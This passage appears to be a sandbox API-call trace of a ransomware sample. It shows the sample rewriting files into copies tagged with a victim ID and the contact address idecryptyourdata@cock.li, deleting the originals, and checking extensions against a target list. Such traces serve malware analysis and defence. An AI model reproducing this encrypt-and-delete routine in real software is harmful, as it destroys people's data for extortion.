lpOverlapped=0x0) returned 1 [0047.160] WriteFile (in: hFile=0x2c0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.160] SetEndOfFile (hFile=0x2c0) returned 1 [0047.161] CloseHandle (hObject=0x2c0) returned 1 [0047.162] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.162] SetEndOfFile (hFile=0x2e0) returned 1 [0047.163] CloseHandle (hObject=0x2e0) returned 1 [0047.163] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.163] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 1 [0047.163] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.163] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.163] lstrlenW (lpString=".doc") returned 4 [0047.163] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.163] lstrlenW (lpString=".docx") returned 5 [0047.163] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.163] lstrlenW (lpString=".pdf") returned 4 [0047.164] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.164] lstrlenW (lpString=".xls") returned 4 [0047.164] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.164] lstrlenW (lpString=".xlsx") returned 5 [0047.164] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.164] lstrlenW (lpString=".ppt") returned 4 [0047.164] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.164] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.164] lstrlenW (lpString=".zip") returned 4 [0047.164] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.164] lstrlenW (lpString=".rar") returned 4 [0047.164] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.164] lstrlenW (lpString=".bz2") returned 4 [0047.164] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.164] lstrlenW (lpString=".7z") returned 3 [0047.164] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.164] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.164] lstrlenW (lpString=".dbf") returned 4 [0047.164] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.164] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.164] lstrlenW (lpString=".1cd") returned 4 [0047.164] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.164] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.164] lstrlenW (lpString=".jpg") returned 4 [0047.164] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.164] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.164] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.164] lstrlenW (lpString=".doc") returned 4 [0047.164] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.165] lstrlenW (lpString=".docx") returned 5 [0047.165] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.165] lstrlenW (lpString=".pdf") returned 4 [0047.165] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.165] lstrlenW (lpString=".xls") returned 4 [0047.165] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.165] lstrlenW (lpString=".xlsx") returned 5 [0047.165] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.165] lstrlenW (lpString=".ppt") returned 4 [0047.165] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.165] lstrlenW (lpString=".zip") returned 4 [0047.165] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.165] lstrlenW (lpString=".rar") returned 4 [0047.165] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.165] lstrlenW (lpString=".bz2") returned 4 [0047.165] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.165] lstrlenW (lpString=".7z") returned 3 [0047.165] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.165] lstrlenW (lpString=".dbf") returned 4 [0047.165] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.165] lstrlenW (lpString=".1cd") returned 4 [0047.165] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0047.165] lstrlenW (lpString=".jpg") returned 4 [0047.165] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.166] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0047.166] lstrlenW (lpString="SetupResources.dll") returned 18 [0047.166] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.166] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=14168) returned 1 [0047.166] CloseHandle (hObject=0x2e0) returned 1 [0047.166] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 0x80 [0047.166] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.166] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.166] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.166] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.167] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.200] GetLastError () returned 0x0 [0047.200] ReadFile (in: hFile=0x2e0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x3758, lpOverlapped=0x0) returned 1 [0047.202] WriteFile (in: hFile=0x2c0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x3760, lpOverlapped=0x0) returned 1 [0047.203] ReadFile (in: hFile=0x2e0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.204] WriteFile (in: hFile=0x2c0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.204] SetEndOfFile (hFile=0x2c0) returned 1 [0047.204] CloseHandle (hObject=0x2c0) returned 1 [0047.205] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.205] SetEndOfFile (hFile=0x2e0) returned 1 [0047.206] CloseHandle (hObject=0x2e0) returned 1 [0047.206] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.206] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 1 [0047.207] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.207] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.207] lstrlenW (lpString=".doc") returned 4 [0047.207] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.207] lstrlenW (lpString=".docx") returned 5 [0047.207] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.207] lstrlenW (lpString=".pdf") returned 4 [0047.207] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.207] lstrlenW (lpString=".xls") returned 4 [0047.207] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.207] lstrlenW (lpString=".xlsx") returned 5 [0047.207] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.207] lstrlenW (lpString=".ppt") returned 4 [0047.207] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.207] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.207] lstrlenW (lpString=".zip") returned 4 [0047.207] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.207] lstrlenW (lpString=".rar") returned 4 [0047.207] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.207] lstrlenW (lpString=".bz2") returned 4 [0047.207] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.207] lstrlenW (lpString=".7z") returned 3 [0047.207] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.207] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.207] lstrlenW (lpString=".dbf") returned 4 [0047.207] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.207] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.207] lstrlenW (lpString=".1cd") returned 4 [0047.207] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.208] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.208] lstrlenW (lpString=".jpg") returned 4 [0047.208] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.208] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.208] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.208] lstrlenW (lpString=".doc") returned 4 [0047.208] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.208] lstrlenW (lpString=".docx") returned 5 [0047.208] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.208] lstrlenW (lpString=".pdf") returned 4 [0047.208] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.208] lstrlenW (lpString=".xls") returned 4 [0047.208] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.208] lstrlenW (lpString=".xlsx") returned 5 [0047.208] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.208] lstrlenW (lpString=".ppt") returned 4 [0047.208] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.208] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.208] lstrlenW (lpString=".zip") returned 4 [0047.208] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.208] lstrlenW (lpString=".rar") returned 4 [0047.208] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.208] lstrlenW (lpString=".bz2") returned 4 [0047.208] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.208] lstrlenW (lpString=".7z") returned 3 [0047.208] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.208] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.208] lstrlenW (lpString=".dbf") returned 4 [0047.208] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.209] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.209] lstrlenW (lpString=".1cd") returned 4 [0047.209] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.209] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0047.209] lstrlenW (lpString=".jpg") returned 4 [0047.209] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.209] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0047.209] lstrlenW (lpString="SetupResources.dll") returned 18 [0047.209] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.209] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=18776) returned 1 [0047.209] CloseHandle (hObject=0x2e0) returned 1 [0047.209] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 0x80 [0047.209] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.210] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.210] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.210] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.210] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.211] GetLastError () returned 0x0 [0047.211] ReadFile (in: hFile=0x2e0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x4958, lpOverlapped=0x0) returned 1 [0047.214] WriteFile (in: hFile=0x2c0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x4960, lpOverlapped=0x0) returned 1 [0047.215] ReadFile (in: hFile=0x2e0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.215] WriteFile (in: hFile=0x2c0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.216] SetEndOfFile (hFile=0x2c0) returned 1 [0047.216] CloseHandle (hObject=0x2c0) returned 1 [0047.217] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.217] SetEndOfFile (hFile=0x2e0) returned 1 [0047.218] CloseHandle (hObject=0x2e0) returned 1 [0047.218] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.218] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 1 [0047.218] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.219] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.219] lstrlenW (lpString=".doc") returned 4 [0047.219] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.219] lstrlenW (lpString=".docx") returned 5 [0047.219] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.219] lstrlenW (lpString=".pdf") returned 4 [0047.219] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.219] lstrlenW (lpString=".xls") returned 4 [0047.219] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.219] lstrlenW (lpString=".xlsx") returned 5 [0047.219] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.219] lstrlenW (lpString=".ppt") returned 4 [0047.219] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.219] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.219] lstrlenW (lpString=".zip") returned 4 [0047.219] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.219] lstrlenW (lpString=".rar") returned 4 [0047.219] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.219] lstrlenW (lpString=".bz2") returned 4 [0047.219] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.219] lstrlenW (lpString=".7z") returned 3 [0047.219] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.219] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.219] lstrlenW (lpString=".dbf") returned 4 [0047.219] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.219] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.219] lstrlenW (lpString=".1cd") returned 4 [0047.219] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.219] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.219] lstrlenW (lpString=".jpg") returned 4 [0047.219] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.220] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.220] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.220] lstrlenW (lpString=".doc") returned 4 [0047.220] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.220] lstrlenW (lpString=".docx") returned 5 [0047.220] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.220] lstrlenW (lpString=".pdf") returned 4 [0047.220] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.220] lstrlenW (lpString=".xls") returned 4 [0047.220] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.220] lstrlenW (lpString=".xlsx") returned 5 [0047.220] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.220] lstrlenW (lpString=".ppt") returned 4 [0047.220] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.220] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.220] lstrlenW (lpString=".zip") returned 4 [0047.220] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.220] lstrlenW (lpString=".rar") returned 4 [0047.220] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.220] lstrlenW (lpString=".bz2") returned 4 [0047.220] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.220] lstrlenW (lpString=".7z") returned 3 [0047.220] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.220] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.220] lstrlenW (lpString=".dbf") returned 4 [0047.220] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.220] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.220] lstrlenW (lpString=".1cd") returned 4 [0047.220] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.221] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0047.221] lstrlenW (lpString=".jpg") returned 4 [0047.221] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.221] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0047.221] lstrlenW (lpString="SetupResources.dll") returned 18 [0047.221] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.221] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=14168) returned 1 [0047.221] CloseHandle (hObject=0x2e0) returned 1 [0047.221] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 0x80 [0047.221] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.221] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.222] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.222] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.222] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.227] GetLastError () returned 0x0 [0047.227] ReadFile (in: hFile=0x2e0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x3758, lpOverlapped=0x0) returned 1 [0047.238] WriteFile (in: hFile=0x2c0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x3760, lpOverlapped=0x0) returned 1 [0047.239] ReadFile (in: hFile=0x2e0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.239] WriteFile (in: hFile=0x2c0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.240] SetEndOfFile (hFile=0x2c0) returned 1 [0047.240] CloseHandle (hObject=0x2c0) returned 1 [0047.241] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.241] SetEndOfFile (hFile=0x2e0) returned 1 [0047.242] CloseHandle (hObject=0x2e0) returned 1 [0047.242] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.242] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 1 [0047.242] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.242] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.242] lstrlenW (lpString=".doc") returned 4 [0047.242] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.242] lstrlenW (lpString=".docx") returned 5 [0047.243] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.243] lstrlenW (lpString=".pdf") returned 4 [0047.243] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.243] lstrlenW (lpString=".xls") returned 4 [0047.243] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.243] lstrlenW (lpString=".xlsx") returned 5 [0047.243] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.243] lstrlenW (lpString=".ppt") returned 4 [0047.243] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.243] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.243] lstrlenW (lpString=".zip") returned 4 [0047.243] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.243] lstrlenW (lpString=".rar") returned 4 [0047.243] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.243] lstrlenW (lpString=".bz2") returned 4 [0047.243] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.243] lstrlenW (lpString=".7z") returned 3 [0047.243] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.243] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.243] lstrlenW (lpString=".dbf") returned 4 [0047.243] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.243] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 